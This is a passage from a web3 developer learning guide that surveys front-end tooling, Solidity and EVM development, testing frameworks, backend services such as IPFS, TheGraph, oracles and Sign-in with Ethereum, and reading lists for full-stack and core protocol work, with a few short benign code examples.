When you are building web3 applications, you usually start with a template. A template is just a group of libraries, pre-built user interfaces, and other tooling that creates a favorable environment for building your application. A lot of the initial hard work to set up a project can be reused across projects to save time and effort on building redundant infrastructure. Many web3 templates have support for smart contracts out of the box, which is what you'll be interacting with most of the time as a front-end developer. It is good to know the basics of smart contracts and understand how to instantiate a contract object from its ABI so you can call its methods within your user interface. That's the biggest overhead when building in web3 in comparison to being a frontend developer in web2, where you only have to care about fetching data from REST or GraphQL APIs. You can build your own templates depending on your needs, or modify already existing ones.

Popular web3 templates include
- moralis-starters
- scaffold-eth
- create-eth-app

Tooling

As a developer, there are many tools you'll use to make building applications easier and more efficient, to collaborate on projects with other people, to manage dependencies, and much more. This is a short section on different tooling you'll find yourself using regularly.

Package management

If you've gotten this far in the front-end specialization, you've certainly had to install packages like React, Next.js, tailwind.css, ethers.js, and many others. The most popular package managers in the JavaScript ecosystem are npm and yarn. Package managers allow you to keep track of which versions of which external code libraries your application uses, as well as how the project's code is structured, how to run different tests, how to run your program, and various other miscellaneous tasks.
As you build more complex applications, it is good to learn the depths of your package manager: how to structure package.json files, how to write scripts that automate the boring stuff, how to set up a CI/CD pipeline (we'll talk about this in a bit), and more.

Package management basics
- npm
- yarn

Styling/Animation

There are many CSS libraries and frameworks which modify the way in which you write CSS. There are libraries that allow you to write CSS within JavaScript, component libraries for React which have a lot of the styling done for you, animation libraries, and more. I'll mention a few of the most popular ones; feel free to suggest changes, as I'm not an expert in the area.

- styled-components (CSS in JS)
- Tailwind.css (CSS framework)
- Framer Motion (animations framework)
- Chakra UI (component library)
- Material UI (component library)
- Next UI (component library)
- Sass (CSS pre-processor)
- PostCSS (CSS pre-/post-processor)
- awesome-CSS (CSS learning repo)

Linting/Formatting

A linter is a static code analysis tool used to flag programming errors, bugs, stylistic errors, and suspicious constructs, while a code formatter makes sure that the code you write has a homogeneous style structure and abides by the formatting rules of a specific programming language (e.g. PEP8 for Python). When you're writing code, it's easy to miss a space, a tab, a colon, or an opening or closing bracket, or to write code with bad and inconsistent styling. That's where linters and formatters come in handy, as they automate the task; they can be configured to run on save and on commit, so that badly styled code never gets into production or into a public repo.

The most popular choices are:
- Eslint
- Prettier

CI/CD

CI/CD stands for continuous integration / continuous deployment. These are tools that let you create automatic processes which execute whenever a change is made to the codebase (usually hosted on the cloud), so that the production servers running your application automatically get updated with the newly pushed code. These actions can also modify and run tests on the code before it gets pushed into production; if tests fail, the commit or update will not go through and collaborators will get notified. Once projects become bigger and have large teams of contributors, a solid CI/CD pipeline is very important in order to maximize the security and correctness of code being pushed into production.

Examples of popular CI/CD tooling are:
- GitHub Actions
- CircleCI
- Husky

Testing

A key part of development is minimizing the number of bugs inside of your application. To ensure that the code behaves as intended, we write unit tests, integration tests, or even end-to-end tests. Each kind of test focuses on a different part of the application lifecycle. Modern tooling like Cypress allows you to simulate all possible states of your application and simulate user flows; you can even record user session tests as if you were recording a real user going through your website. In web3 you will also be doing integration tests for smart contract interaction. You can test smart contracts using libraries like Foundry, Hardhat or Truffle. Most of these tests will be written by a smart contract or full-stack developer; however, as a frontend developer, you need to test how the interactions with the contracts will influence the flow of the user interface of your application. You can write various tests in JavaScript with ethers.js and couple them with Cypress to write complex tests.
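As an illustrative sketch, a contract-level test in a Hardhat project (using its ethers plugin and Chai, and assuming the Counter contract from earlier in this guide) might look like this:

```typescript
import { expect } from "chai";
import { ethers } from "hardhat";

describe("Counter", () => {
  it("increments the count", async () => {
    // Deploy a fresh instance of the Counter contract for the test.
    const Counter = await ethers.getContractFactory("Counter");
    const counter = await Counter.deploy();
    await counter.deployed();

    // Call inc() and assert that get() reflects the new state.
    await (await counter.inc()).wait();
    expect((await counter.get()).toString()).to.equal("1");
  });
});
```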
The web3 app development lifecycle usually goes from locally deployed smart contracts and front-end, to testnets (a live network environment but with non-valuable assets), and then to mainnet (not necessarily Ethereum mainnet; it can be an L2 like Arbitrum, a sidechain like Polygon PoS, etc). On the smart contract side, development teams hire external security auditors to verify that the contracts are secure to use; we will cover this in-depth in the smart contract development section.

- Cypress
- Jest
- Mocha

ENS integration

ENS domains are human-readable domains for Ethereum addresses; the registrar for these domains is fully on-chain, and the protocol is decentralized and governed by a DAO. ENS domains serve as an on-chain identity mechanism which many Ethereum users use to express themselves on-chain and to display information about themselves through ENS profile metadata, containing contact information like email, Twitter, or Discord, links to websites, a profile picture (NFT image metadata), and more. As a web3 front-end developer you can tap into this registrar and display users' information once they've connected to your application with their web3 wallet.

The best way to get started with ENS is their official documentation, where you can get a general understanding of the ENS protocol. For integrating ENS into your dapp, visit this section. You need to perform 3 steps in order to support ENS within your application:

- Resolve ENS names
- Support reverse resolution
- Let users manage their ENS names

If you are interested in how the on-chain parts of ENS work, check out the smart contract development section.

Further learning and development

By now you have learned a solid technology stack that can enable you to build all kinds of user interfaces for web3 apps. In order to really ingrain these technologies, you need to build pet projects or join a team full-time. Even if you only know a few of them, you can join a team and get upskilled there, as your learning will be supercharged by more experienced coworkers who will act as mentors most of the time. The front-end development landscape is constantly evolving; new technologies will come and go, and it is in your best interest to look at trends in the industry and adopt them once there are clear signs of them becoming widely used. You will keep improving your technology stack over time, especially as you become more senior and are able to reason about why you want to use one tool over another and how it fits the needs of the applications that you are building.

Build, Build, Build! Try creating small projects that implement ideas you come up with and practice the technologies you want to master. Also, don't be shy about asking questions of other web3 developers, and form learning groups with your friends or other industry members. Also, read over the Getting a Job and Mastery sections of this guide to get more insight into soft skills which are useful for growing as a developer.

Smart contract development

Writing decentralized applications (Dapps) requires knowing how to write smart contracts, as they are pieces of code that live on blockchains and can be executed inside of virtual machines. To write contracts you need to learn the programming languages that compile to a target that the virtual machine can understand. In the case of the Ethereum blockchain, we have the EVM, which has a set of operations it supports (a.k.a. OPCODES).
The most popular language for writing smart contracts on Ethereum is Solidity, a statically typed, object-oriented, high-level programming language that takes inspiration from C++, Python, and JavaScript. With Solidity, you can program logic that executes inside of the EVM, and the result of its operations is stored on the blockchain forever. The state of these applications is easily accessible from a full node or from a third-party data indexing platform. The goal of smart contract developers is to create secure applications which perform a certain action, for example a contract that allows users to swap tokens, to buy and sell NFTs, to vote on proposals, etc.

There are many different stages in the smart contract development lifecycle: experimentation, iteration, testing, auditing, testnet deployment, and mainnet deployment. There are also different sets of best practices that developers and production teams adopt in order to mitigate the security and economic risk of their applications. Another important part of writing smart contracts on Ethereum or Ethereum L2s is optimizing the contracts to minimize the amount of gas they consume. Since block space on Ethereum and L2s is limited, there needs to be a fee mechanism that assigns a gas price to each operation executed by the respective VM in order to avoid state bloat. That means that the more complex a smart contract is, the more expensive it will be to deploy and for users to use. There are various design patterns that optimize the code to consume the least amount of gas possible whilst remaining readable and secure.

Solidity

Solidity is by far the most popular language for writing smart contracts at the moment, as the EVM is the most widely adopted virtual machine out there. Not only is it used in Ethereum's execution layer, but many alt L1s and L2s on Ethereum use the EVM as their virtual machine, since it has a fairly mature development ecosystem. In order to first learn Solidity, we'll go over a few simple courses that explain the principles of the language, and as we progress further we will talk about design patterns, testing, security, oracles, and more.

CryptoZombies is an interactive web application that teaches you the basics of Solidity through a fun development game. It teaches you how to create a contract, the data types that Solidity supports, how to write methods, how to manage objects, events, inheritance, memory management, interfaces, modifiers, and more. By the time you finish the first three short courses, you'll be able to read and write Solidity code. An alternative to CryptoZombies in video form is the Solidity playlist from Smart Contract Programmer on YouTube. This one is a bit better, as it covers Solidity 0.8.0, which is a fairly recent version.

After we finish the course with the basics, we'll move on to building small projects implementing various different protocols, applications, and cryptographic primitives through the scaffold-eth challenges that appear in this thread. Scaffold-eth is a web3 development template built by Austin Griffith and open-source contributors which abstracts the backend of your app and creates a front-end interface for interacting with the smart contracts that you write. We will start with the Ethereum Speed Run challenges in the thread mentioned above, and continue with building more complex applications like a signature-based multisig, an app that uploads images to IPFS, and more.
Another great way to learn Solidity is to look through already-written code, for example https://solidity-by-example.org/.

Now that you've been writing more and more complex smart contracts, it is a good idea to start looking at other people's code to get a feel for how they implement different features, how they structure code, what designs and patterns they use, how they optimize for gas, and a lot more. There are many techniques that you'll pick up along your journey to make your contracts more resource-efficient and gas-optimized, so that your users don't need to spend as much money to use your applications.

A good example of well-made smart contracts at the intermediate level are Miguel Piedrafita's lil-web3 contracts. They are simple implementations of popular protocols and applications. They also have tests attached to them which are written using Foundry, which we will cover shortly. Take a look at how comments are written, how events and errors are used, how the code is structured, which gas minimization techniques are employed, and try to understand the design of the protocol implementation. Trying to implement your own versions of well-known applications and protocols is a great way to improve at Solidity, as you'll learn a lot about the development process that you'll go through once you are writing production code at a company or DAO.

Threads that talk about getting really good at Solidity:
- Tips from Emilio Frangella @ Aave
- Tips from @freddycoen
- Tips for non-beginners from @0xCacti
- Tips from @transmissions11

Once you've gone through all of the above, the best thing you can do to learn advanced Solidity is to see what the best codebases look like. Look at how they structure their projects, what gas optimizations they use, what Solidity patterns they employ, how they do tests, how they create interfaces, how they handle events and errors, and what libraries/dependencies they use (if any), etc.

Examples of great codebases:
- Uniswap v2 / Uniswap v3
- Gnosis Safe
- Compound finance
- Zora v3
- Rari Capital
- Ribbon Finance
- AAVE
- SushiSwap

Testing

Testing smart contracts is an essential part of the development process, as it ensures that the code you write behaves as intended and is secure against various technical and economic exploits. Many different libraries are used by different teams; there are pros and cons to each, and in some cases they can be used in a complementary fashion. We will cover the ones most popular among top-tier developers as well as the most commonly used ones like Hardhat and Truffle.

Opinionated recommendations: Foundry and Hardhat

Foundry

Foundry is the hottest library in the Ethereum development landscape. It was originally built by Georgios Konstantopoulos, who is one of the most highly respected developers in the entire Ethereum ecosystem. Georgios is currently the CTO at Paradigm, and part of his job is building tools for developers that will be used to create the applications of the future.

Foundry is composed of two parts: Forge and Cast.
- Forge: a fast and flexible Ethereum testing framework, inspired by Dapptools.
- Cast: a Swiss army knife for interacting with EVM smart contracts, sending transactions, and getting chain data.

The library is written in Rust, a systems-level programming language with memory safety, borrow checking, performant concurrency, and many other features which are making it one of the favorite languages used by developers across all fronts.
Many popular libraries are being written in Rust, popular compiler targets like WASM are supported by Rust, and a lot of Ethereum developer tooling is built using Rust or is refactoring its infrastructure to use Rust. It is a very exciting trend in blockchain development, and many developers are learning the language to be able to contribute to these cool pieces of software. The best way to get started with Rust is The Rust Book and the Rustlings repo.

The reason why Foundry is gaining so much popularity, and why it is so important, is that Solidity tests should be written in Solidity and not in JavaScript. It is very hard to master two different languages at once, and Solidity developers shouldn't be forced to learn JavaScript just to be able to test their smart contracts. Foundry's development environment is also becoming increasingly superior in terms of features. The main feature for which you might still use other toolkits is deployment, which is not supported by Foundry so far. For managing deployments, the standard toolkit is Hardhat. For testing, gas optimization features, fuzzing, symbolic execution (hevm), etc., do use Foundry.

Good resources for learning and mastering Foundry are:
- The Foundry Book - community-sourced documentation
- Tweet from @andreasbigger: Familiarize yourself w/ the Forge CLI
- Check out some templates:
  - FrankieIsLost forge template
  - ZeframLou forge template
  - AndreasBigger femplate
- Dive into repos using Foundry:
  - lil-web3
  - n3rp
  - zen
  - cloaks
  - ethernaut-x-foundry
  - damn-vulnerable-defi-foundry
  - Multicall
- Brockelmore's testing verbosity with forge-std

HardHat

Hardhat is the Ethereum development library that's the most widely used across the ecosystem and is the standard in most production codebases like Aave, Uniswap, and many others. Usually all the deploy scripts, migration files, automation scripts, etc. are written using Hardhat and its tooling suite. It is a JavaScript library (with Typescript support). Recently the Hardhat team announced that they are moving their infrastructure to Rust, as most of the tooling ecosystem is moving to use it due to its performance and security.

Truffle Suite

Truffle Suite is a suite of tools developed by Consensys to locally test smart contracts by deploying them on a local instance of the Ethereum blockchain, mocking user addresses using the Ganache library, writing tests using Truffle, and creating on-chain data pipelines for user interfaces using Drizzle. It was one of the first complete Ethereum developer tooling ecosystems to be released, but it has fallen out of favor in recent years as libraries like Hardhat overtook it.

Dapptools

Dapptools is a suite of Ethereum-focused CLI tools following the Unix design philosophy, favoring composability, configurability, and extensibility.

There are 4 key elements in Dapptools:
- dapp - All-you-need Ethereum development tool. Build, test, fuzz, formally verify, debug & deploy Solidity contracts.
- seth - Ethereum CLI. Query contracts, send transactions, follow logs, slice & dice data.
- hevm - Testing-oriented EVM implementation. Debug, fuzz, or symbolically execute code against local or mainnet state.
- ethsign - Sign Ethereum transactions from a local keystore or hardware wallet.

A cool innovation from Dapptools was hevm, an EVM implementation written in Haskell (a functional programming language) that allows you to symbolically execute Solidity code and formally verify the results of the resulting bytecode (opcode operations).
This feature was later adopted by Foundry, along with many others that were first provided by Dapptools.

Design patterns

Once you're comfortable with writing more and more complex contracts, and maybe after taking a look at front-end code and how it interacts with the smart contracts, you'll start getting a feel for how smart contracts are designed from a more high-level view. There are certain designs and patterns which are commonplace, like the approve pattern for tokens, and more. At this point, it is a good idea to start thinking more about the overall architecture of your code and the structure it will take to efficiently implement the functionality you want to enable. There are common patterns employed in smart contract development; this Solidity-patterns repo implements some of them.

Since the EVM is such a constrained environment, where each additional operation executed adds gas costs to the execution of the smart contract, developers try to build contracts that are as resource-efficient as possible whilst also maximizing readability and security. Since blockchains are a very adversarial environment where mistakes in a smart contract could lead to fund drains (rugs) and exploits, smart contracts can be considered mission-critical software. Many developers therefore take inspiration from the guidelines for other mission-critical software, like those of NASA, which are responsible for the lives of astronauts going to space. These development principles are guidelines that help optimize a codebase for maximum security through the adoption of a standardized procedure and developer mindset.

ENS integration

We mentioned how to integrate ENS domain names into your dapp in the front-end development section, but as a smart contract developer you can also resolve ENS domain names on-chain, write your own resolver which implements EIP137, or even write your own registrar.

Specialized languages

There are various programming languages that can be compiled into EVM bytecode. There are high-level programming languages such as Solidity, Vyper, or Fe, but there's also an intermediate programming language called Yul that's often used within gas-optimized contracts, and as a developer you can also write EVM assembly by using the EVM opcodes directly. A common technique for gas minimization is writing Solidity code, looking at the resulting EVM assembly, and comparing the gas cost of different implementations in order to make the contract as gas-efficient as possible.

Yul

Yul is an intermediate-level programming language that can compile into EVM bytecode. From the Solidity documentation:

"The design of Yul tries to achieve several goals:
- Programs written in Yul should be readable, even if the code is generated by a compiler from Solidity or another high-level language.
- Control flow should be easy to understand to help in manual inspection, formal verification, and optimization.
- The translation from Yul to bytecode should be as straightforward as possible.
- Yul should be suitable for whole-program optimization.

In order to achieve the first and second goals, Yul provides high-level constructs like for loops, if and switch statements and function calls. These should be sufficient for adequately representing the control flow for assembly programs. Therefore, no explicit statements for SWAP, DUP, JUMPDEST, JUMP and JUMPI are provided, because the first two obfuscate the data flow and the last two obfuscate control flow.
Furthermore, functional statements of the form mul(add(x, y), 7) are preferred over pure opcode statements like 7 y x add mul because, in the first form, it is much easier to see which operand is used for which opcode."

EVM Assembly

EVM assembly can be written inside of Solidity with inline assembly blocks using the assembly keyword. It allows for more fine-grained control over the resulting bytecode, since the compiler is oftentimes unable to optimize Solidity code well, resulting in unnecessary gas costs. There's also an unchecked keyword in Solidity which disables the overflow and underflow checks from the compiler; these checks were introduced in Solidity 0.8.0 and were previously provided by the SafeMath library in the OpenZeppelin libraries. The unchecked keyword is oftentimes used to save gas on arithmetic that is already known to be safe, for example loop counters that can't realistically overflow. Writing Yul or inline assembly can obfuscate the functionality of your code by making it less readable for other contributors/auditors, and it can potentially introduce new risks, as the Solidity compiler oftentimes performs various optimizations and security checks.

Good toolkits for writing EVM assembly:
- etk
- huffc
- and the aforementioned Yul intermediate language

EVM deep dive

Understanding the ins and outs of the EVM is crucial for building highly optimized applications, as each operation executed by the EVM has a gas cost attached to it, and users have to pay the price for executing functions within the applications that they use. There is a compromise between readability and code optimizations, however, which needs to be taken into consideration. Sometimes using techniques like bit-shifting and bitmapping (Hacker's Delight is a good book that talks about bit manipulation techniques in detail) can have a negative impact on readability and thus security, as other contributors and auditors may not be able to wrap their heads around these complex optimizations, or it would simply take too much time for them to do so. For code that actually goes into production, each project needs to assess how much they want to optimize their code for gas savings over readability. Security usually comes first; however, there is still a set of well-known good practices that will allow you to save some gas. If you end up using gas optimization techniques, it is also advised to document them well with comments inside of your Solidity contracts.

Another important point is that as these technologies scale and developers become less constrained by the virtual machine executing smart contract bytecode, the need for optimizations becomes less important; the compilers converting static code to machine code are also getting better and better at optimizing code for performance and low cost. As technologies like L2s and data availability layers become mainstream, we may also see the emergence of new VM architectures that experiment with designs which do not require developers to work with low-level optimizations, as they will be highly performant and scalable.
For a comprehensive EVM deep dive, I suggest these resources:
- Ethereum Explained: The EVM
- The EVM Handbook
- EVM development starter kit
- Read Chapter 13 (EVM) of The Ethereum Book
- Read Femboy Capital's Playdate with the EVM
- Go over OpenZeppelin's series on Deconstructing smart contracts
- Read Analyzing smart contracts by Elvira Albert (very math heavy)
- Read over TakeNobu's slides on how the EVM works (visualized)
- Go over the design patterns section
- Go over the exemplary good codebases at the beginning of the Solidity section
- Follow gas optimizoors like @transmissions11 for gas alpha
- Get used to looking up the gas costs of different OPCODE operations at EVM Codes
- Check out the EVM execution specs
- Learn to use Foundry well
- Bonus resources in the comments of this Twitter thread

Special thanks to @0x_doggie and @freddycoen, from whose threads I extrapolated these resources.
- Thread 1
- Thread 2

You might want to go through Nick's Posts and Jean's Solidity articles.

Backend development

As far as blockchain development goes, most of the logic that traditional applications would consider backend is encapsulated within smart contracts. However, there are also complementary technologies that allow you to query data from blockchains, index the data, create databases so that you have on-demand data from custom APIs, decentralized storage for content, user authentication / DID, and more. I wouldn't consider this its own specialization, but it is a sufficiently unique skill set for me to cover it separately.

This web3 stack landscape graphic was created by my fren Nader Dabit, a full-stack blockchain developer who has created many useful guides, some of which I'll feature in the full-stack development section. It comes from a recent blog post of his called The complete guide to full-stack web3 development.

Decentralized File Storage

There are many applications that require storing files of all sorts and making them available for your decentralized applications. NFTs, for example, only have a link to the metadata URI on-chain, and that URI points to a decentralized storage endpoint on IPFS or Arweave. This means that all the images and traits of the NFT are hosted on these file storage networks rather than on the Ethereum mainnet, in order to save on costs and allow for higher bandwidth.

IPFS

IPFS is one of the most popular decentralized file storage solutions out there; projects like Filecoin are being built on top of it, and much NFT metadata is hosted inside of the network. Solutions like NFT.Storage make hosting your NFT metadata on the network completely free by leveraging their JavaScript API.

Arweave

Arweave is another such solution. Arweave is a type of storage that backs data with sustainable and perpetual endowments, allowing users and developers to truly store data forever – for the very first time. As a collectively owned hard drive that never forgets, Arweave allows developers to remember and preserve valuable information, apps, and history indefinitely.

An increasingly popular use case of decentralized file storage solutions is web hosting. Since we are on a quest to build decentralized applications that are uncensorable, it is good practice to also decentralize the user interface by deploying it on decentralized file storage networks like IPFS and Arweave. This prevents the applications you built from being censored by centralized entities shutting down your deployments on centralized platforms like Vercel, AWS, Azure, or any other.
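To make the storage side concrete, here is a hypothetical sketch of uploading NFT metadata with the NFT.Storage JavaScript client mentioned above (the API key and file contents are placeholders; check their docs for the current API):

```typescript
import { NFTStorage, File } from "nft.storage";

async function uploadMetadata() {
  // An API key from nft.storage (placeholder).
  const client = new NFTStorage({ token: "YOUR_API_KEY" });

  // store() uploads the image and metadata to IPFS and returns an ipfs:// URI
  // that you can put on-chain as the token URI.
  const metadata = await client.store({
    name: "My NFT",
    description: "Metadata hosted on IPFS rather than on-chain",
    image: new File([/* image bytes */], "nft.png", { type: "image/png" }),
  });

  console.log("token URI:", metadata.url); // e.g. ipfs://bafy.../metadata.json
}

uploadMetadata().catch(console.error);
```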
Part of good practice for modern applications is open-sourcing the front end so that anyone can run it locally, deploying several instances to decentralized file storage solutions, and usually also hosting a front end on a centralized server for added performance.

Indexing / Querying

The applications you will be building need to know what the state of the blockchain is, so that your users know what is happening and can interact with the application effectively. An example of this is Uniswap's AMM. In order to call the swap function in the smart contracts, you need to know how many tokens you will get back for the amount of ETH that you put into the contract. In order to display the current price of any asset, your application will either query data from the blockchain directly or use an indexing service that has that data already available. These APIs are very useful and are a critical part of any application.

TheGraph

A very popular service is TheGraph. TheGraph is a decentralized indexing protocol that allows you to query networks like Ethereum; the protocol has an incentive layer that rewards indexers for creating APIs for the data you specify. Developers can create so-called subgraphs, which are data APIs that make the data easily accessible through a GraphQL schema. GraphQL is a querying language that is used as an alternative to traditional REST APIs. GraphQL schemas are harder to set up initially, but in turn they enjoy massive scalability. In order to learn more, check out their documentation. To learn how GraphQL works, check out the official documentation, HowToGraphQL, and this YouTube playlist (although it may be a bit outdated by now; better check the documentation).

CovalentHQ

An upcoming service and simpler alternative to TheGraph is Covalent. Its API allows you to pull detailed, historical, and granular data from multiple blockchains with no code. It has a rich palette of endpoints serving data from categories including balances, NFTs, and DeFi. The APIs provide data for several different blockchains like Ethereum, Polygon, and Avalanche, and are currently free to use. In order to learn more, check out their documentation and API docs. They also have an active YouTube channel with a playlist on building web3 projects using Covalent.

Nodes as a service

One of the most common ways to query data from the blockchain is by calling the RPC endpoints of nodes that sync the full state of the blockchain. A node runs the Ethereum blockchain, has all of its state, and syncs every time a new block appears. You can run your own node on consumer hardware, but this is unscalable if you want to use those nodes to query data for massive applications, as you'd need to build your own DevOps pipelines in order to scale to your needs. That's why most developers use a third-party node provider like Alchemy, Nodereal, or Infura. You can call these APIs by using web3 libraries like ethers.js, web3.js, or myriad others.

Moralis

Moralis is a web3 development platform that automates your backend. Instead of you having to query data from nodes, index the data, and create databases so that you don't need to query the blockchain on every user request, Moralis does it for you. You instantiate a Moralis server that exposes all blockchain data through a REST API backed by a PostgreSQL database. It also has smart contract alerts, cloud functions, cross-chain user authentication, and more.
The only downside of using Moralis is that it's a centralized service provider. It is the easiest way to get a backend for your Dapp going, as Moralis has a very simple-to-use SDK that helps you tap into the APIs offered by their services. It is a great way to get started building backends, as most of the heavy lifting is done for you. To learn how to use Moralis, check out their documentation and their YouTube channel.

Thirdweb

Thirdweb provides smart contracts, SDKs, and UI components that creators, game studios, and developers can integrate into their apps. To learn how to use Thirdweb, check out their documentation.

Oracles

Oracles are data feeds that bring off-chain data on-chain, so that the smart contracts that you build can query real-world information and build logic around it. For example, prediction market Dapps use oracles to settle payments based on events. A prediction market may ask you to bet your ETH on who will become the next president of the United States. They'll use an oracle to confirm the outcome and pay out the winners.

- What is an oracle? - Chainlink

Chainlink is the most popular oracle out there; you'll usually use it to get price feeds, to get verifiable randomness, to call external APIs, etc. If you want to get started building with Chainlink, go to their documentation.

DID / Authentication

DID (decentralized identity) and web3 user authentication are a disruptive new primitive on the internet, as we can be self-sovereign users of the internet and own our own value within it for the first time in human history. Usually your user profile is managed by centralized service providers like Google, Facebook, Apple, Amazon, and others. In web3, the concept of a digital identity is much broader, as it can span many more areas such as financial history, games, social interaction (decentralized social media, i.e. Lens Protocol), and much more. It is still not clear what web3 user management will look like a few years from now, but there are a few solutions that are being standardized and are emerging as potential winners.

SpruceID

SpruceID is a decentralized identity toolkit that allows users to sign and verify W3C verifiable credentials which are configurable across many interfaces. Use cases cited in the SpruceID documentation include: authenticity for NFT creators, decentralized backup or recovery of decentralized identity, decentralized onboarding for private DeFi pools, decentralized app-hosting, and many more potential use cases in the future. In order to integrate the Spruce DID solutions, visit their developer portal.

Sign-in with Ethereum

Sign-in with Ethereum is an initiative that came out of EIP-4361, which set out to standardize how Ethereum accounts interact and authenticate with off-chain services by signing a standard message format parameterized by scope, session details, and security mechanisms (e.g., a nonce). The goals of this specification are to provide a self-custodied alternative to centralized identity providers, improve interoperability across off-chain services for Ethereum-based authentication, and provide wallet vendors a consistent machine-readable message format to achieve improved user experiences and consent management. Many application builders have already adopted this signature standard for building applications on Ethereum, as it streamlines the process for everyone and makes it more seamless for users, since they sign easily readable messages per EIP-191.
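A minimal sketch of what constructing and signing such a message can look like with the siwe JavaScript library and ethers v5 (field values are illustrative; see the EIP and library docs for the full flow, including server-side nonce handling and verification):

```typescript
import { SiweMessage } from "siwe";
import { ethers } from "ethers";

async function signInWithEthereum() {
  const provider = new ethers.providers.Web3Provider((window as any).ethereum);
  await provider.send("eth_requestAccounts", []);
  const signer = provider.getSigner();

  // Build the standard EIP-4361 message; the nonce should come from your server.
  const message = new SiweMessage({
    domain: window.location.host,
    address: await signer.getAddress(),
    statement: "Sign in to the example app.",
    uri: window.location.origin,
    version: "1",
    chainId: 1,
    nonce: "served-by-backend", // placeholder
  });

  // The wallet shows the human-readable EIP-191 message for the user to sign.
  const signature = await signer.signMessage(message.prepareMessage());

  // Send { message, signature } to your backend, which verifies them and
  // creates a session for the authenticated address.
  console.log(signature);
}
```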
The aim of this EIP is to create a login standard, much as web2 login with Google and Facebook became a catalyst for adoption.

Automation

Within blockchain applications, many actions are repetitive and cumbersome to execute: adjusting the ranges of an active Uniswap v3 liquidity provision strategy, claiming rewards from yield vaults, and many other actions that users would like to automate to avoid manual execution overhead.

Gelato network

Gelato Network is an automation protocol that runs as a decentralized network of bots used by web3 developers to automate smart contract executions on public EVM-compatible blockchains including Ethereum, Polygon, Fantom, Arbitrum, Binance Smart Chain, and Avalanche. In order to get started automating tasks inside your application, check out the official Gelato documentation, which has tutorials on setting up bots to regularly execute any given task in exchange for a small transaction fee. The typical setup pairs the contract function you want executed with a checker that tells the bots when to run it; the documentation walks through concrete contract examples.

Miscellaneous APIs

When building applications you will want to display miscellaneous information from various other applications or protocols, e.g. price feeds for different tokens on different AMMs, the price of NFTs listed on different marketplaces, various data from services your application relies on, etc. As a backend developer, your responsibilities are to know where to find reliable sources of data for your application and to build the infrastructure needed to fetch it so that frontend developers can display it on the site. It is also important to build redundancy for the data you query and to store it in your own databases, so that your application keeps working if an API dependency fails (see the fetch-with-fallback sketch at the end of this section).

OpenSea

A good example of such an API is OpenSea's API, which is public and can be queried to get the prices of NFT listings on OpenSea, floor prices, volumes, historical price data, NFT metadata, and more. As a developer, you can also create your own databases and API endpoints that serve data from those databases. This can also be a way to earn revenue, by building SaaS services around API keys with rate limits on how much data anyone can query off your servers. For building APIs you can, for example, use a REST stack with NodeJS and PostgreSQL, or write a TheGraph subgraph.

Full-stack blockchain development

As the name implies, full-stack blockchain development is the closest specialization to being a jack of all trades. It involves building out all aspects of an application, from front end to smart contracts to backend (at least to a certain degree). This is the most generic role that most blockchain developers take and the one most companies and DAOs look for in a contributor. Since there is such high demand for quality developers in the space, employers often onboard people from other fields and turn them into jacks of all trades within web3 development, to save costs and reduce hiring needs (good developers are incredibly scarce nowadays). Since restating the front end, back end, and smart contract sections would be pointless, I'll dedicate this section to listing full-stack guides, tips and tricks, deployment guidelines, project management, and other relevant information.
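Returning to the redundancy point from the miscellaneous-API discussion above, here is a minimal, hedged sketch of fetching marketplace data defensively with Python's requests library. The endpoint URL is a placeholder, not a real OpenSea route, and the in-memory cache stands in for the database layer you would actually build.

```python
# Sketch: fetch third-party API data with a fallback to the last known
# good value, so an upstream outage does not take your app down with it.
import requests

CACHE: dict[str, dict] = {}  # stand-in for your own database


def fetch_listing_stats(collection: str) -> dict:
    # Placeholder endpoint; substitute the real marketplace API route.
    url = f"https://api.example-marketplace.invalid/v1/collections/{collection}/stats"
    try:
        resp = requests.get(url, timeout=5)
        resp.raise_for_status()
        data = resp.json()
        CACHE[collection] = data  # keep a copy to survive future outages
        return data
    except requests.RequestException:
        # Fall back to cached data instead of failing the user's request.
        if collection in CACHE:
            return CACHE[collection]
        raise
```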
Full-stack guides
- Introduction to Ethereum Development - Austin Griffith
- The Complete Guide to Full Stack Web3 Development - Nader Dabit
- Speed Run Ethereum - Austin Griffith
- Solidity, Blockchain, and Smart Contracts Course - Beginner to Expert Python Tutorial - Patrick Collins
- Full-stack blockchain solidity course - Patrick Collins

Full-stack tutorials
- Introduction to Ethereum
- Build Uniswap Blockchain Web3 App with Solidity | Next.js | Sanity.io

Building and deploying on L2s and DA layers (coming soon)
- Optimism: Developer docs, new Bedrock protocol specs
- Arbitrum: Developer docs, protocol description
- zkSync: Developer docs, new 2.0 docs
- Starknet / StarkEx: StarkNet / Cairo docs

Core protocol development

General Learning

There are many topics to learn about in core development, and one can specialize in any area. Here is a selection of learning resources.

Basic:
- Merkle trees: Ethereum execution-layer Merkle Patricia Tree walkthrough
- Execution and Consensus layer Merge design, video by Danny Ryan
- Rollup centric roadmap, post by Vitalik
- Ethereum protocol ELI5 (coming soon)

Medium:
- Yellow Paper: L1 protocol specification in paper form
- ABI: Application Binary Interface to interact with contracts
- EVM opcodes: interactive reference
- RLP: the encoding used everywhere in the execution layer
- SSZ specs: encoding and merkleization of Eth2; also see visualized encoding and visualized hash-tree-root
- EVM: overview of the machine that runs smart contracts
- Executable specs: readability-first Python implementations of the protocol specification
  - Consensus layer, also see the pip package
  - Execution layer, also see the rendered version
- Simplified Eth2 Phase0 specs intro
- Light client design and implementation

Advanced:
- Builder proposer separation:
  - Proposer/block builder separation-friendly fee market designs
  - Flashbots: frontrunning the MEV crisis (state of research)
- Fork-choice Gasper paper: Combining GHOST and Casper
- Dagger-Hashimoto (legacy PoW)
- State DB design, Erigon docs:
  - Choice of storage engine
  - State representation
- BLS:
  - Signature aggregation in eth2 by Justin Drake
  - BLS12-381 For The Rest Of Us by Ben Edgington
  - BLS Signature for Busy People by Paul Miller
- KZG:
  - KZG polynomial commitments by Dankrad Feist
  - ZK Study Club part 1: polynomial commitments, by the ZK FM podcast with Justin Drake
- ZK:
  - ZK study club playlist by the ZK FM podcast
- Fraud proofs (optimistic rollup tech):
  - The State of Optimistic Rollup, an older overview by Daniel Goldman
  - Inside Arbitrum (the Arbitrum fraud proof)
  - Cannon (the Optimism fraud proof)
- LibP2P: the network layer in Eth2, Polkadot, Filecoin, and other blockchains
- DevP2P: the original network layer in Eth1 / the execution layer of Ethereum
- Whisk: a practical shuffle-based SSLE protocol for Ethereum
- VDF research: verifiable delay functions for Ethereum and other protocols
- Data Availability Sampling (DAS):
  - DAS in practice
  - DAS in the full sharding design

L2

